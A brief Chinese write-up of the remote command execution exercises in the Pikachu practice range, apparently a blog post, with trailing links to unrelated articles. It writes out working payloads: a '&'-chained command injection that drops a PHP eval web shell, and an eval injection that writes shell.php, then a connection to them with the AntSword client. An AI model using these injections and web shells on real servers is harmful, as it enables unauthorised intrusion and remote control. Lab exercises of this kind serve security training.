Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
眷蓝天19 小时前
Docker 镜像瘦身:从 GB 到 MB 的优化实践
运维·docker·容器
实心儿儿19 小时前
Linux —— 进程控制 - mini shell
linux·运维·服务器
程序员黄老师20 小时前
Windows文件移动到Linux上的坑
linux·运维·服务器
shizhan_cloud20 小时前
自动化部署Kubernetes集群
运维·kubernetes
mounter62520 小时前
【内核前沿】Linux IPC 迎来大变局?POSIX 消息队列增强、io_uring IPC 与 Bus1 十年回归
linux·运维·服务器·kernel·ipc·io_uring
wzl2026121321 小时前
企业微信定时群发技术实现与实操指南(原生接口+工具落地)
java·运维·前端·企业微信
2401_8955213421 小时前
Linux下安装Redis
linux·运维·redis
网络小白不怕黑21 小时前
2.1VMware部署Windows_server_2008_R2
运维·服务器
一叶飘零_sweeeet1 天前
Docker Compose实战指南
运维·docker·容器
Bruce_Liuxiaowei1 天前
Windows防火墙规则导出工具:让安全配置可备份、可迁移、可审计
运维·windows·安全·网络安全